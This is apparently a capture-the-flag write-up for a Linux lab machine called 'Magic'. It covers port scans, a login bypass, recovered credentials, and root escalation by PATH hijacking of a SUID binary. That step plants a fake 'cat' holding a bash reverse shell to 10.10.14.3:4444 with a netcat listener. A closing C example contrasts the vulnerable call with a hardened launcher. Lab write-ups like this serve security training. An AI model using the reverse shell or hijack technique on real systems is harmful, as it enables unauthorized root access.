Magic

| Operating system | Difficulty | Release date | Creator |
|---|---|---|---|
| Linux | Medium | 18 April 2020 | TRX |
Port scan

```bash
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.185
```

```
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 21:12 -03
Initiating SYN Stealth Scan at 21:12
Scanning 10.10.10.185 [65535 ports]
Discovered open port 80/tcp on 10.10.10.185
Discovered open port 22/tcp on 10.10.10.185
Completed SYN Stealth Scan at 21:13, 19.81s elapsed (65535 total ports)
Nmap scan report for 10.10.10.185
Host is up, received user-set (0.39s latency).
Scanned at 2025-04-21 21:12:51 -03 for 20s
Not shown: 60463 closed tcp ports (reset), 5070 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.89 seconds
Raw packets sent: 96944 (4.266MB) | Rcvd: 60961 (2.438MB)
```
Service and version enumeration

```bash
nmap -sCV -p22,80 -oN servicesScan 10.10.10.185 -vvv
```

```
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 21:13 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating Ping Scan at 21:13
Scanning 10.10.10.185 [4 ports]
Completed Ping Scan at 21:13, 0.26s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:13
Completed Parallel DNS resolution of 1 host. at 21:13, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:13
Scanning 10.10.10.185 (10.10.10.185) [2 ports]
Discovered open port 22/tcp on 10.10.10.185
Discovered open port 80/tcp on 10.10.10.185
Completed SYN Stealth Scan at 21:13, 0.27s elapsed (2 total ports)
Initiating Service scan at 21:13
Scanning 2 services on 10.10.10.185 (10.10.10.185)
Completed Service scan at 21:13, 6.54s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.185.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:13
Completed NSE at 21:14, 6.94s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 1.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 0.00s elapsed
Nmap scan report for 10.10.10.185 (10.10.10.185)
Host is up, received reset ttl 63 (0.25s latency).
Scanned at 2025-04-21 21:13:49 -03 for 14s
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ=
|   256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.35 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (128B)
```
Initial exploitation

SQLi login bypass

We intercept the login request with Burp Suite.

Magic numbers

Credentials found:

```
theseus:Th3s3usW4sK1ng
```
Privilege escalation (root)

We look for binaries with the SUID bit set and inspect the strings of the one that stands out:

```bash
find / -perm -4000 2>/dev/null
strings /bin/sysinfo
```
Path hijacking

We modify the PATH.

We create a binary that replaces cat, with the following content:

```bash
bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'
```

We give it execute permissions:

```bash
chmod +x cat
```

We listen on port 4444 with Netcat:

```bash
nc -lnvp 4444
```
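Added here as a defender's illustration, not code from the machine or from the original writeup: the pattern that makes the path hijacking above possible (a privileged helper, assumed to behave like sysinfo, calling `cat` through the shell's PATH lookup) beside a hardened launcher that rejects relative command names and executes with a fixed, trusted PATH instead of the caller's environment.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern (assumed behaviour of a sysinfo-style SUID helper):
 * "cat" is resolved through the caller's PATH, so whoever prepends a
 * writable directory to PATH runs their own "cat" with the helper's
 * privileges. */
int sysinfo_vulnerable(void)
{
    return system("cat /proc/cpuinfo | head -n 1");
}

/* Returns 1 when a command name would be looked up via PATH. */
int resolved_via_path(const char *cmd)
{
    return cmd[0] != '/';
}

/* Minimal fixed environment: the helper never inherits the caller's PATH. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Hardened pattern: absolute program path, explicit argv, execve with the
 * fixed environment. Returns the child's exit status, 127 if the program
 * could not be executed, or -1 for a rejected (relative) path. */
int run_fixed_path(const char *abs_path, char *const argv[])
{
    if (resolved_via_path(abs_path))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);            /* exec failed: never fall back to a PATH search */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const argv[] = { "cat", "/proc/version", NULL };
    /* Same action as the vulnerable helper, but immune to PATH changes. */
    printf("exit status: %d\n", run_fixed_path("/bin/cat", argv));
    return 0;
}
```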